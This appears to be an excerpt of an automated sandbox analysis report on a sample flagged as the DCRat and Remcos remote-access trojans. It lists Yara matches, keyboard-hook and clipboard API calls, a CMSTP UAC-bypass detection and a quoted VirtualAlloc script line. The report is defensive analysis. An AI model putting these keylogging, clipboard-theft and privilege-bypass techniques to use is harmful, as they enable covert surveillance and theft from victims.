        Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTR
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx

        E-Banking Fraud

        Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.2293840182.0000000002B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2306410441.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000021.00000002.2465197293.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000002.2318995170.0000000003537000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000002.2453487662.0000000003017000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.3307138781.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001B.00000002.2427511925.0000000002B17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.2441743999.00000000029F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: winhlp32.exe PID: 6540, type: MEMORYSTR

        Spam, unwanted Advertisements and Ransom Demands

        Source: C:\Windows\winhlp32.exe | Code function: 17_2_0041C9E2 SystemParametersInfoW
        Source: C:\Windows\winhlp32.exe | Code function: 19_2_0041C9E2 SystemParametersInfoW
        Source: C:\Windows\winhlp32.exe | Code function: 21_2_0041C9E2 SystemParametersInfoW
        Source: C:\Windows\winhlp32.exe | Code function: 23_2_0041C9E2 SystemParametersInfoW
        Source: C:\Windows\winhlp32.exe | Code function: 27_2_0041C9E2 SystemParametersInfoW

        System Summary

        Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5670000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.6240000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5ed0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 2.2.wscript.exe.5e40000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
        Source: 31.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
        Source: 33.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 29.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 17.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 19.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 21.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 23.2.winhlp32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 27.2.winhlp32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000004.00000002.3316092029.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000008.00000002.2081271482.00000000032BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000006.00000002.2078678717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 0000001B.00000002.2426815620.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000004.00000002.3309788726.0000000003118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000004.00000002.3309788726.0000000002FBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000008.00000002.2085488605.0000000005756000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000008.00000002.2081271482.00000000032A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000000A.00000002.2085289507.0000000002CEA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000017.00000002.2317972555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000006.00000002.2077756210.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000015.00000002.2305710782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 0000000A.00000002.2085289507.0000000002CD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 0000001F.00000002.2453206516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000004.00000002.3306976580.00000000010A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 0000001D.00000002.2441328509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
        Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing the string DcRatBy Author: ditekSHen
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
        Source: 00000021.00000002.2464792970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
        Source: Process Memory Space: wscript.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 4148, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 4068, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 3160, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Process Memory Space: RegAsm.exe PID: 2964, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
        Source: Initial file: tte.Register "kernel32.dll", "VirtualAlloc", LCase("i=puuu"), LCase("r=p")
        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
